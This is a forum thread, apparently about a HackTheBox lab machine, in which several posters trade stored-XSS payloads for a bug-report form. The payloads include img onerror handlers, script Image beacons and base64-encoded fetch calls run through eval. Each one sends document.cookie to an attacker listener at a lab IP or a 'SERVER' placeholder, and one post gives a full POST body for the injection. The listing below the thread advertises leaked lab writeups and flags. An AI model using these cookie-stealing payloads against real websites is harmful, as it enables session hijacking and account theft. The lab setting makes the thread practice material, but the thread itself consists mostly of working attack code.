Possibly Related Threads…

osamy7593 · 04-27-2024, 10:22 PM

(04-27-2024, 10:00 PM)3kyy Wrote:
(04-27-2024, 09:38 PM)xxxbfacc Wrote: cookie from report_bugs via img tag xss

<img src=x onerror="location.href='10.10.14.8:8888/?c='+ document.cookie">
<script>var i=new Image(); i.src="http://10.10.14.8/?cookie="+btoa(document.cookie);</script>
<script>var i=new Image();i.src="http://10.10.14.8:8888/?c="+document.cookie</script>

dont work for me, and I tried with CSP bypass:

worked ? .............................................................

theunknownbliss · 04-27-2024, 10:27 PM

Anything with priv esc? Got nothing with linpeas or manual enumeration

ox9Days · 04-27-2024, 11:23 PM

(04-27-2024, 10:37 PM)andlommy Wrote: <img src=x onerror="eval(atob('')">

works
payload is regular fetch with document cookie in url

tried multiple payloads, none of them work, is there anything we need to do before submitting the bug report with the paylond in it? which parameter is affected?
i tried in both params these payloads and none worked...:
<img src=x onerror=eval(atob(this.id)) id=ZmV0Y2goJ2h0dHA6Ly8xMC4xMC4xNC44Ni8/Y29va2llPScrZG9jdW1lbnQuY29va2llKQo=>
<img src="fetch('http://10.10.14.86:80/?cookie='+document.cookie); " onerror="xss(1)">
<img src=x onerror="eval(fetch('http://10.10.14.86:80/?cookie='+document.cookie))">
<img src="non-existing-image.png" onerror="fetch('http://10.10.14.86/?cookie='+document.cookie);" />
<img src=https://github.com/favicon.ico width=0 height=0 onload=this.src='http://10.10.14.86/?'+document.cookie>

asdfmonster · 04-27-2024, 11:25 PM

"payload is regular fetch with document cookie in url "

I do not understand.

Like this?

<img src=x onerror="eval(atob('fetch('http://SERVER/?cookie='+document.cookie)')"> but in b64 payload?

xxxbfacc · 04-27-2024, 11:33 PM

Ok. I'm taking a break for a bit. But I'll leave this tidbit.
You need to steal more than one cookie...

asdfmonster · 04-27-2024, 11:51 PM

report_title=xxx&description=<img src=x onerror=eval(atob('ZmV0Y2goJ2h0dHA6Ly9TRVJWRVI/Y29va2llPScrZG9jdW1lbnQuY29va2llKQ=='))>

Like this?? I cannot get it to work.

osamy7593 · 04-28-2024, 12:37 AM

anyone help us xss not work why

asdfmonster · 04-28-2024, 12:43 AM

Yeah I am really confused. Seems pretty straight forward. Just modifying the:
"POST /report_bug
report_title=xxx&description=xxx"
correct? It redirects and I see nothing in my server.

xxxbfacc · 04-28-2024, 12:54 AM

pdf generator seems rabbit holey.
But I'm probably just missing something...

osamy7593 · 04-28-2024, 01:01 AM

(04-28-2024, 12:54 AM)xxxbfacc Wrote: pdf generator seems rabbit holey.
But I'm probably just missing something...

bro what payload for xss

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	360	88,710	03-28-2026, 09:28 AM Last Post: catsweet
	[FREE] HTB-ProLabs APTLABS Just Flags	kewlsunny	23	2,348	03-28-2026, 03:30 AM Last Post: lulaladrow
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	87	7,490	03-27-2026, 07:22 PM Last Post: stn
	HTB Eloquia User and Root Flags - Insane Box	69646B	13	350	03-27-2026, 06:14 PM Last Post: vlxw
	HTB - ALL Challenges you Stuck in	osamy7593	2	646	03-27-2026, 04:24 PM Last Post: catsweet